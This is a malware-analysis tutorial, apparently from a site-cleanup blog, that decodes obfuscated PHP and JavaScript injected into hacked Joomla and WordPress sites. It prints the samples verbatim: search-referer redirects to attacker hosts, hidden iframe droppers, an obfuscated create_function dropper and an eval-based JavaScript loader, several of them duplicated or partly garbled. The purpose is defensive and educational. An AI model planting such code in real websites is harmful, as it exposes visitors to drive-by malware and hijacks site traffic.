$tmp=base64_encode('I am a really malicious line of code!');
to encode the malicious code. Then add the base64_decode function to a site's pages
eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');
to add the malicious code to the site. While a site owner would instantly be suspicious of
I am a really malicious line of code!
the purpose of the line of code
eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');
is not as clear. While eval(base64_decode('SSBhbSBhIHJlYWx...'); is the most common, hackers also use other PHP functions such as
eval(gzinflate(base64_decode('...');
eval(gzuncompress(base64_decode('...);
eval(gzinflate(str_rot13(base64_decode('...');
eval(gzuncompress(base64_decode('...);
eval(gzinflate(str_rot13(base64_decode('...');
PHP code executes on your server and the results of that execution are inserted into the code that is sent to the user's browser. If you open a page in a browser and view the source for the page you will not see the PHP code; you will see whatever output is being generated by the script. To find and remove the actual PHP code you will need to edit the files on your server. I have a tool online at Redleg's PHP base64 Decoder which will decode most base64 encoded stuff.
The following base64 encoded PHP was found in the homepage, index.php, of a Joomla site, but this type of code can be found on any site running PHP.
eval(base64_decode("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"));
Which decodes to the following script --
// Decoded payload exactly as found in index.php (kept verbatim as evidence; the
// comments are the analyst's reading of each line, not part of the sample).
// Detection hint: the combination error_reporting(0) + headers_sent() + HTTP_REFERER
// + header("Location: ...") in a template file is a strong indicator of this family.
error_reporting(0);
// Suppress PHP errors so a failed redirect or echo never surfaces to the site owner.
$trum=headers_sent();
// Both values come straight from the visitor's request headers and are fully client-controlled.
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
// Only Internet Explorer visitors are targeted; every other browser (and most scanners) gets a clean page.
if (stristr($ua,"msie"))
{
if (!$trum)
{
// Visitors arriving from a Yahoo/Google/Bing results page ...
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
// ... unless the referer looks like a site:/cache:/inurl: operator search.
// Note the `or` between negated tests: this condition is only false when ALL
// three strings appear in the referer, so the exclusion is much narrower than it reads.
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
// Redirect target (IoC from the sample).
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
// Headers already sent: fall back to injecting a 1x1 hidden iframe (second IoC from the sample).
// "< if rame" appears to be the page's deliberately broken rendering of "<iframe", and the
// nested unescaped double quotes would not parse as printed — treat the string as transcribed, not literal.
echo "< if rame frameborder="0" height="1" scrolling="no" src="http://rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></iframe>";
}
}
// Repeated copy of the same decoded listing (the page prints it twice; this copy omits the
// leading error_reporting(0) line). Logic is identical to the first copy and is kept verbatim.
$trum=headers_sent();
// Client-controlled request headers.
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
// IE-only targeting.
if (stristr($ua,"msie"))
{
if (!$trum)
{
// Search-engine referer gate.
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
// `or` between negated tests: only false when all three operator strings are present.
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
// Redirect target (IoC from the sample).
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
// Fallback when headers are already sent: hidden 1x1 iframe (IoC from the sample; "< if rame" as printed on the page).
echo "< if rame frameborder="0" height="1" scrolling="no" src="http://rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></iframe>";
}
}
Now let's take a closer look at the code
error_reporting(0); --> Turns off php error reporting
Note: Anytime you see a php script start with
error_reporting(0); or
error_reporting(E_ERROR | E_WARNING | E_PARSE); or
ini_set('display_errors', "0");
you should be suspicious. These lines of code are used by hackers to turn off php's error reporting.
error_reporting(0); or
error_reporting(E_ERROR | E_WARNING | E_PARSE); or
ini_set('display_errors', "0");
you should be suspicious. These lines of code are used by hackers to turn off php's error reporting.
$trum=headers_sent(); --> sets the variable to true if headers have already been sent to the requester.
$referer=$_SERVER['HTTP_REFERER']; --> sets the variable to the referring page.
$ua=$_SERVER['HTTP_USER_AGENT']; --> sets the variable to the user agent in the request.
if (stristr($ua,"msie")) --> if the string 'msie' is in the user agent, continue; 'msie' appears in the user agent string of Internet Explorer
if (!$trum) --> if headers have not been sent, continue
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) --> If the string yahoo, google or bing is in the URL of the referring page, i.e. the visitor arrived from a search results page.
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")) --> The conditional checks whether the search operators site:, cache:, or inurl: are in the referring page; the intent is that the redirect will NOT (!) occur when they are. Note that because the three negated checks are joined with `or`, the condition is only false when all three strings are present, so in practice the redirect still fires when only one or two of them appear.
header("Location: http://alapotremnba.osa.pl/rif/"); -> this line of code redirects the request to the malicious location.
exit();
else --> This else goes with the headers sent line: if headers have already been sent then trying to redirect would create a PHP error, so instead of redirecting it adds a malicious hidden iframe to the page.
echo "< if rame frameborder="0" height="1" scrolling="no" src="http:// rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></if rame>"; -> writes the malicious iframe.
The following code examples are common redirects.
base64_decode(\"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudC gpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRV InXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIH sNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZX IsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJ hbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciw ibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlci wibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSB vciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW5 5dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/ KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3Vy bFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzd HJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJh b2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigk cmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9 wcXcuamt1Yi5jb20vIi k7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==\")
Which writes a conditional redirect
// Decoded conditional redirect, kept on one line as found. Same family as the index.php sample,
// with a much wider referer list (search engines, rambler/yandex, social sites, URL shorteners)
// and Internet Explorer 7.0 explicitly excluded rather than IE being required.
// The cache/inurl exclusion again uses `or` between negated tests, so it is only skipped when
// BOTH strings are present in the referer.
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
// Redirect target (IoC from the sample). The page prints this closing line twice; the second copy is a duplicate.
header("Location: http://www6.uiopqw.jkub.com/"); exit(); }}} } }
header("Location: http://www6.uiopqw.jkub.com/"); exit(); }}} } }
eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFU
kVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VS
VkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjoga
HR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw
0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInl
haG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbS
FRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRw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"));
// Decoded "search keyword" redirect: extracts the visitor's query from the referer
// (q= for Bing and Google, p= for Yahoo) and forwards it to the attacker's site so the
// landing page can be tailored to the search term. Unlike the other samples there is no
// error_reporting(0), no headers_sent() check and no user-agent gate.
// `$_SERVER[http_REFERER]` is as printed on the page; the original is presumably
// $_SERVER['HTTP_REFERER'] (bare constant, lowercased in transcription) — verify against the base64.
if (stristr($_SERVER[http_REFERER],"bing"))
{
preg_match ("/q\=(.*?)&/",$_SERVER[http_REFERER],$kk);
// Redirect target (IoC from the sample); the captured query is appended unencoded.
header("Location: http://proppera.co.cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"yahoo"))
{
// Yahoo uses p= for the query parameter.
preg_match ("/p\=(.*?)&/",$_SERVER[http_REFERER],$kk);
header("Location: http://proppera.co.cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"google"))
{
// Here the exclusions are joined with `and`, so any of ".nu", "site" or "inurl" in the referer suppresses the redirect.
if (!stristr($_SERVER[http_REFERER],".nu")
and !stristr($_SERVER[http_REFERER],"site")
and !stristr($_SERVER[http_REFERER],"inurl"))
{
// Greedy capture of everything after q=, then trimmed at the first "&" if present.
preg_match ("/q\=(.*)/",$_SERVER[http_REFERER],$kk);
if (stristr($kk[1],"&"))
{
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}
else
{
$keyword=urldecode($kk[1]);
}
header("Location: http://proppera.co.cc/?q=".$keyword);
exit();
}
}
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZG
Vyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSW
ydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FH
RU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3
RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW
5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0
cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiK
Sl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS
5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
// Decoded variant of the referer redirect: same structure as the index.php sample but with
// no user-agent gate ($ua is read and never used), so every search-engine visitor is redirected.
// `http_REFERER` / `http_USER_AGENT` are as printed on the page (presumably HTTP_* in the original).
error_reporting(0);
$nccv=headers_sent();
if (!$nccv)
{
$referer=$_SERVER['http_REFERER'];
$ua=$_SERVER['http_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
// `or` between negated tests: only false when all three operator strings are present.
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
// Redirect target (IoC from the sample).
header("Location: http://buyordie.osa.pl/");
exit();
} } }
The following block of code is being found on a lot of WordPress sites. In most cases it has been redirecting search results to uniqtext.com/search.php?theme=[*search query used*].
// Obfuscated WordPress dropper. Variable names ($wp_salt, $wp_add_filter) mimic WordPress
// internals so the block blends into a casual read of the file. $md5 is never used in the lines shown.
$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
// Character table; the index sequence below spells out the function body one character at a time.
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
// Reading the indices against the table gives: eval(gzinflate(base64_decode($v)));
// i.e. $wp_add_filter is an anonymous "decode and execute" function. create_function()
// (deprecated in PHP 7.2, removed in 8.0) is itself eval-based, so grep for it alongside eval(.
$wp_add_filter = create_function('$'.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[12]);
// The payload is a gzip-compressed, base64-encoded blob; the page truncates it ("and so on").
$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKVjQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh
...... (and so on) .......
7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984ZKT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');
On many sites hackers will use obfuscated PHP code such as
eval(gzinflate(base64_decode('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhpp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H0T3h0swdf002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4IN
RPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98
vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16SgFzUN/e3yvAF3zbXS
gveO7dbv/AcJ1j7+fWVeQP+DQ==');
to write some obfuscated JavaScript
<!-- Obfuscated JavaScript loader, kept verbatim (n is a single string literal spanning
     many lines, so do not reformat). The decoding scheme is visible in the source:
     f is built up to 'fromCharCode', zz to 'val', and e = this[f.substr(11)+zz] resolves
     to this['eval']; n is split on '~' ('a~'.substr(1)), each entry is scaled by h and
     converted with String[f], and the resulting string q is passed to e(). The page's
     author shows the decoded result (an iframe dropper) directly after this block.
     The try/catch probes around document and 'qwe'.prototype appear to be checks that the
     code is running in a real browser rather than a decoder — stub them when analysing. -->
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new'qwe'.prototype}
catch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~
50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~
38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5
~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~
3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~
48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56
~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~
53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~
48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55
~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~
51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~
18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~
57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~
54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~
57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16
~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~
54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~
47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~
56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~
47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~
48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~
22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~
22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~
51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~
50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~
59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~
49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~
53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~
29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~
18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~
19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~
56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~
50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~
48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~
56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~
19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~
28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));for(i=0;i!=611;i++){j=i;
ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(''+q);</script>
to add a malicious iframe to the pages on the site.
// De-obfuscated loader output: injects a 10x10, hidden, absolutely-positioned iframe
// pointing at the attacker's host (IoC from the sample). If <body> already exists the
// iframe is appended via DOM calls; otherwise it is written inline with document.write.
// Detection: signature on the iframe src, not on the size/style attributes.
if (document.getElementsByTagName('body')[0]) {
iframer();
}
else {
// The string literal below is line-wrapped by the page ("s / tyle"); as printed it
// would not parse — treat it as transcribed text, not runnable code.
document.write("
<iframe src='http://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' s
tyle='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Builds the same hidden iframe through the DOM API and appends it to <body>.
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://motivemus.mooo.com/showthread.php?t=45122773');
// Off-screen and invisible: the frame still loads, the visitor never sees it.
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
This is another example of obfuscated script used to insert an iframe, but here the PHP is "double" encoded. This is the code you would find in your homepage or one of your common files:
eval(gzinflate(base64_decode('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');
When we plug that long string of characters into the decoder we get
// Decoded first layer, kept on one line as found. What the code visibly does:
// - $frmDs (a global) guards against the block running twice in one request.
// - Only Windows + MSIE user agents are targeted; error reporting is turned off only for them.
// - If "admin" appears anywhere in the Cookie header or the request URI, $isadm is set:
//   the marker cookie __utmfr is then issued for 365 days and the <script> is NOT printed —
//   so a logged-in site administrator (presumably via an /admin-style URL) never sees the injection.
// - Everyone else gets __utmfr for 7 days and the injected <script> once per cookie lifetime,
//   which also hides the payload from repeat visits by the same client or scanner.
// - The cookie value comes from rand(), and setcookie()/$_SERVER reads are @-suppressed.
// Detection hint: the cookie name __utmfr (mimicking Google Analytics __utm* names) plus
// the error_reporting(0) / setcookie / print(base64_decode(...)) combination.
if (!isset($frmDs)){ global $frmDs; $frmDs = 1; $ua = $_SERVER['HTTP_USER_AGENT']; if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){ error_reporting(0); if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1; if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/'); if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print('<script>'.base64_decode('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').'</script>'); } }
While it is starting to be a little more readable, we still have another long base64 encoded string; plug that into the decoder and we can now see the JavaScript that is appearing in the pages of the site.
// Second layer, one line as found (the numeric Array literal was elided from the page).
// Visible behaviour: the try/catch probes on document.body and createElement appear to
// confirm a real browser DOM before continuing; v is built up to "eval" and resolved as
// e = w[v]; then 709 entries of the array are turned into characters with
// String.fromCharCode(w[j] + e("j%4")) and the resulting string is passed to eval.
// When decoding offline, stub the DOM probes or the loader silently does nothing.
try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array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}w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}
After "de-obfuscating" the JavaScript, the purpose of the code becomes clear:
// Random integer in the inclusive range [a, b]; used to randomise the iframe's size and offset.
function gra(a, b){
return Math.floor(Math.random() * (b - a + 1)) + a;
}
// Random alphanumeric string (base-36 digits of Math.random() with the leading "0.xxx" dropped);
// used as a one-off CSS class name and as the cookie value, so neither is stable across loads.
function rs(){
return Math.random().toString(36).substring(5);
}
// Client-side half of the injection: for Windows + MSIE visitors it writes an off-screen
// <div> (negative left/top of 600-1000px) containing an iframe of random size that loads the
// attacker's feed.php (IoC from the sample), then sets the same __utmfr cookie the server
// side checks, for 7 days, so the payload is served once per visitor.
// Detection: key on the iframe src; the class name, offsets and dimensions differ on every load.
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
// "!=- 1" is "!= -1" with odd spacing (as printed).
if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) +
'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm +
'"><iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) +
'" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
// Marker cookie mirrors the server-side one; absence of __utmfr is what triggers the injection.
if (document.cookie.indexOf('__utmfr=') ==- 1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}
return Math.floor(Math.random() * (b - a + 1)) + a;
}
// Repeated copy of rs() from the page's duplicated listing (identical to the first copy).
function rs(){
return Math.random().toString(36).substring(5);
}
// Repeated copy of the injection block from the page's duplicated listing; identical to the
// first copy (off-screen iframe to the feed.php IoC for Windows+MSIE, then a 7-day __utmfr cookie).
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) +
'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm +
'"><iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) +
'" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
if (document.cookie.indexOf('__utmfr=') ==- 1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}
When the JavaScript is executed by the user's browser we get a hidden iframe loading malicious content from another site:
<!-- Rendered result of one execution. The class name (from rs()) and the offsets/dimensions
     (from gra()) are regenerated on every page load, so a signature should key on the iframe
     src rather than on the class or sizes. The third line is a duplicated copy of the second. -->
<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4">
<iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="564" height="303"></iframe></div>
<iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="564" height="303"></iframe></div>